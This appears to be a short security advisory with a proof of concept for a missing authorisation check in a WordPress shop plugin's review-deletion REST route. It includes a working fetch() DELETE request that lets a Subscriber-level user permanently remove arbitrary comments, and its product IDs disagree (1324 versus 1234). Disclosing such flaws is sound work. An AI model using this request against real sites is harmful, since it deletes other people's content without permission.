The plugin does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment
Log in as any user (with privileges as low as Subscriber).
fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "DELETE",
"credentials": "include"
});
That needs product 1234 to not exist. It will permanently remove comment with ID 2.